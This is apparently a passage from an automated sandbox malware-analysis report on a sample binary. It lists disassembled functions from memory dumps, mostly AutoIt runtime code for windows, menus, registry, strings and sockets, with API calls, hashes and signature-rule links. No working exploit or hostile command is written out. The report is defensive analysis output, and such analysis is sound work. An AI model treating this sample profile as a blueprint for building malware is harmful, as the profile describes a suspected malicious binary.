SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A062EC
GetWindowLongW.USER32(01383EA8,000000F0), ref: 00A0631F
GetWindowLongW.USER32(01383EA8,000000F0), ref: 00A06354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A06386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A063B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00A063C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A063DB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 070e3945c23a9b7b6b24e10724b09854a6e94b2e13cc41fba2a3d27650c1bf49
Instruction ID: cf20a900cefd99361b4026b556b774ef25e3acc416a091c04a14380c017e9311
Opcode Fuzzy Hash: 070e3945c23a9b7b6b24e10724b09854a6e94b2e13cc41fba2a3d27650c1bf49
Instruction Fuzzy Hash: BA310734A442589FDB20CFA8EC84F5537E1FB5A718F194164F5019F2F2CB72A852DB92

Function 009DDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDB54
SysAllocString.OLEAUT32(00000000), ref: 009DDB57
SysAllocString.OLEAUT32(?), ref: 009DDB75
SysFreeString.OLEAUT32(?), ref: 009DDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 009DDBA3
SysAllocString.OLEAUT32(?), ref: 009DDBB1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 66d1a69ee41ae844658dfadb406bd9eb64399b2766ba13af8627083fd8551149
Instruction ID: 5897edddfc43ae306c8f879987588604006356d08bbe97286672a3b2d6d06fcc
Opcode Fuzzy Hash: 66d1a69ee41ae844658dfadb406bd9eb64399b2766ba13af8627083fd8551149
Instruction Fuzzy Hash: 4D218136601219AFDF10DFA8DC88CBB73ACEB09364B018537FD14DB290D6749C4287A0

Function 009F6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009F61C6
WSAGetLastError.WSOCK32(00000000), ref: 009F61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F620E
connect.WSOCK32(00000000,?,00000010), ref: 009F6217
WSAGetLastError.WSOCK32 ref: 009F6221
closesocket.WSOCK32(00000000), ref: 009F624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6263

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 9be08985e4a3a11df3e9ee00575e3b67e7cdbab538691b666526889521ddad66
Instruction ID: 87377021ee28b01497e91d0670b7876c3efffa71e94300e3af650b206b41c852
Opcode Fuzzy Hash: 9be08985e4a3a11df3e9ee00575e3b67e7cdbab538691b666526889521ddad66
Instruction Fuzzy Hash: 5831A13160020CAFDF10EF64CC85BBE77ACEB45724F048029FA15E7291CB74AC059BA1

Function 009DF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 009DF671
__wcsnicmp.LIBCMT ref: 009DF692
__wcsnicmp.LIBCMT ref: 009DF6AC

Strings

#OnAutoItStartRegister, xrefs: 009DF6A6
#notrayicon, xrefs: 009DF669
#requireadmin, xrefs: 009DF68C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 3870916730501496b65b6af1ebc72619fbf1ae46779f792047c2db1ba8569171
Instruction ID: e3b6ef659b89a900b8e066979041f100c55a80e74f296222abe2c4ca89a194ee
Opcode Fuzzy Hash: 3870916730501496b65b6af1ebc72619fbf1ae46779f792047c2db1ba8569171
Instruction Fuzzy Hash: 9321797228411167D620AA34AC23FE7739CEF96344F50C83BF8478A291EB54DD81C3D4

Function 009DDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DDC2F
SysAllocString.OLEAUT32(00000000), ref: 009DDC32
SysAllocString.OLEAUT32 ref: 009DDC53
SysFreeString.OLEAUT32 ref: 009DDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 009DDC76
SysAllocString.OLEAUT32(?), ref: 009DDC84

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: fd9484b01ebae1f3608e7f0720b5d652d63eb7a01d039f82d41e1974e1d11f16
Instruction ID: 72691c287c37fa034901e12bf51b383ef637d236d62b3b84ac57941ae597133e
Opcode Fuzzy Hash: fd9484b01ebae1f3608e7f0720b5d652d63eb7a01d039f82d41e1974e1d11f16
Instruction Fuzzy Hash: 67216235645208AFDB20DFF8DC88DAB77ACEB49360B10C126F954DB260D674DD42C764

Function 00A075CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A07632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A0763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A0764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A07659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A07665

Strings

Msctls_Progress32, xrefs: 00A07603

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: adcf505e972d1000f6462b90f2935f6eceb70d5c27c0bf025ea918ecc4a268ff
Instruction ID: 8998da0dee7c79696441fa9b8fda10c45e00afe81cd0555f4801d5678575a377
Opcode Fuzzy Hash: adcf505e972d1000f6462b90f2935f6eceb70d5c27c0bf025ea918ecc4a268ff
Instruction Fuzzy Hash: B611B6B151011DBFEF119F64DC85EEB7F6DEF08798F014114BA05A2090C772AC22DBA4

Function 009A9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 009A9AE6

Part of subcall function 009A3187: EncodePointer.KERNEL32(00000000), ref: 009A318A
Part of subcall function 009A3187: __initp_misc_winsig.LIBCMT ref: 009A31A5
Part of subcall function 009A3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A9EA0
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A9EB4
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A9EC7
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A9EDA
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A9EED
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A9F00
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009A9F13
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A9F26
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A9F39
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A9F4C
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A9F5F
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A9F72
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A9F85
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A9F98
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A9FAB
Part of subcall function 009A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A9FBE

__mtinitlocks.LIBCMT ref: 009A9AEB
__mtterm.LIBCMT ref: 009A9AF4

Part of subcall function 009A9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A9AF9,009A7CD0,00A3A0B8,00000014), ref: 009A9C56
Part of subcall function 009A9B5C: _free.LIBCMT ref: 009A9C5D
Part of subcall function 009A9B5C: DeleteCriticalSection.KERNEL32(00A3EC00,?,?,009A9AF9,009A7CD0,00A3A0B8,00000014), ref: 009A9C7F

__calloc_crt.LIBCMT ref: 009A9B19
__initptd.LIBCMT ref: 009A9B3B
GetCurrentThreadId.KERNEL32 ref: 009A9B42

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 4e68ab628719ef99ea974f14f55b273d11822f3ea8b42eaee06f3f58d3f99d74
Instruction ID: 41112344e06cd1644b03d20f486d60084fe01b4f4ee607b3c3f5e4ec349d7002
Opcode Fuzzy Hash: 4e68ab628719ef99ea974f14f55b273d11822f3ea8b42eaee06f3f58d3f99d74
Instruction Fuzzy Hash: CDF090325097115AE734B7B8BC0374B3694FF83734F214A1AF461D90D2EF20844245E0

Function 009A406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A3F85), ref: 009A4085
GetProcAddress.KERNEL32(00000000), ref: 009A408C
EncodePointer.KERNEL32(00000000), ref: 009A4097
DecodePointer.KERNEL32(009A3F85), ref: 009A40B2

Strings

combase.dll, xrefs: 009A4080
RoUninitialize, xrefs: 009A4074

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 450b80197adc2a70d8e0d02f5f6dd2c65563afc0c92ad75cdf772da7cbef1ca5
Instruction ID: dd391f3791804ac7820e8efde6342e51222025ef4cae1e56fa2d1274149cd1d2
Opcode Fuzzy Hash: 450b80197adc2a70d8e0d02f5f6dd2c65563afc0c92ad75cdf772da7cbef1ca5
Instruction Fuzzy Hash: 6EE09279581304EFEF60EFE5EC0EB453AA8BB86742F104625F511E54A0CBB786439B15

Function 009E64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009E660B
_memmove.LIBCMT ref: 009E6546

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

_memmove.LIBCMT ref: 009E65B9
_memmove.LIBCMT ref: 009E66A0
_memmove.LIBCMT ref: 009E66B9
_memmove.LIBCMT ref: 009E66D5

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
Instruction ID: 334f35936cecfd99a4354da40a78f76eb06ec5c358e6cdf4aa38a44516ed230f
Opcode Fuzzy Hash: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
Instruction Fuzzy Hash: 09619B3050028A9BCF02FF65CC82BFE37A9AF95708F084919F8595B292DB35ED05DB90

Function 00A001E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A002BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A002FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A00320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A00349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A0038C
RegCloseKey.ADVAPI32(00000000), ref: 00A00399

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 9aaaea0229c42131a285909978e3bac35f959874038ac45455c4df40c6ba7a2e
Instruction ID: 31e4c981b4e606ee9abbe6adf901d26c19ff87e9e300d2c04a4183562e99e634
Opcode Fuzzy Hash: 9aaaea0229c42131a285909978e3bac35f959874038ac45455c4df40c6ba7a2e
Instruction Fuzzy Hash: E6515931108204AFCB15EF64D885EAFBBE9FF89314F04491DF5559B2A2DB31E905CB52

Function 00A05799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A057FB
GetMenuItemCount.USER32(00000000), ref: 00A05832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A0585A
GetMenuItemID.USER32(?,?), ref: 00A058C9
GetSubMenu.USER32(?,?), ref: 00A058D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00A05928

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 0b8176aa010f5fda1612ab5b8a20bfec36181ed3c5728bf2e4d9f2961ee91bc3
Instruction ID: 69f10fc16fc0d05abd162beaa7c92275161aa10f96802d52102338ccf695349a
Opcode Fuzzy Hash: 0b8176aa010f5fda1612ab5b8a20bfec36181ed3c5728bf2e4d9f2961ee91bc3
Instruction Fuzzy Hash: 97513B35E00619AFCF15EFA4D845AAEB7B5EF88310F148069EC15BB391CB71AE419F90

Function 009DEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009DEF06
VariantClear.OLEAUT32(00000013), ref: 009DEF78
VariantClear.OLEAUT32(00000000), ref: 009DEFD3
_memmove.LIBCMT ref: 009DEFFD
VariantClear.OLEAUT32(?), ref: 009DF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009DF078

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: caad373349fd783ef39006f38c7d8e9b2b4be186c955f2d47da9615913f32b85
Instruction ID: 2eacd3068ac8b51f068a14c2d626f13cca97ddb5af75f70ff6e49be0c3c4d7cf
Opcode Fuzzy Hash: caad373349fd783ef39006f38c7d8e9b2b4be186c955f2d47da9615913f32b85
Instruction Fuzzy Hash: 73515AB5A00209EFDB14DF58C894AAAB7B8FF4C314B15856AED59DB301E335E911CFA0

Function 009E220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E22A3
IsMenu.USER32(00000000), ref: 009E22C3
CreatePopupMenu.USER32 ref: 009E22F7
GetMenuItemCount.USER32(000000FF), ref: 009E2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009E2386

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
Instruction ID: eab89f3838325bd60c1b9ef09d2b2386f02c807f8b5adfbd4328058201a89ae7
Opcode Fuzzy Hash: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
Instruction Fuzzy Hash: 2F51CF7060028ADFCF22CF6AC888BAEBBFDAF45714F104529E815A7291E3799D05CF51

Function 00981765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0098179A
GetWindowRect.USER32(?,?), ref: 009817FE
ScreenToClient.USER32(?,?), ref: 0098181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0098182C
EndPaint.USER32(?,?), ref: 00981876

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: ea4edb6b6b1e489f41c058e6e3aa5a49674d1d72bb107fd4c753e7b7e586e1d7
Instruction ID: 1073870bf73402558b581ac3cc748fa98f2d1e8808badc99ed9f62faf62e093e
Opcode Fuzzy Hash: ea4edb6b6b1e489f41c058e6e3aa5a49674d1d72bb107fd4c753e7b7e586e1d7
Instruction Fuzzy Hash: D241A1345047049FD710EF64CC85FBA7BECEB86724F040629F9A4872A2C7719847DB61

Function 00A0B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00A457B0,00000000,01383EA8,?,?,00A457B0,?,00A0B5A8,?,?), ref: 00A0B712
EnableWindow.USER32(00000000,00000000), ref: 00A0B736
ShowWindow.USER32(00A457B0,00000000,01383EA8,?,?,00A457B0,?,00A0B5A8,?,?), ref: 00A0B796
ShowWindow.USER32(00000000,00000004,?,00A0B5A8,?,?), ref: 00A0B7A8
EnableWindow.USER32(00000000,00000001), ref: 00A0B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A0B7EF

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
Instruction ID: dd71b246ea0981a8694402f73f20a1dd220591b435e8fb738776a4abd3b86fad
Opcode Fuzzy Hash: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
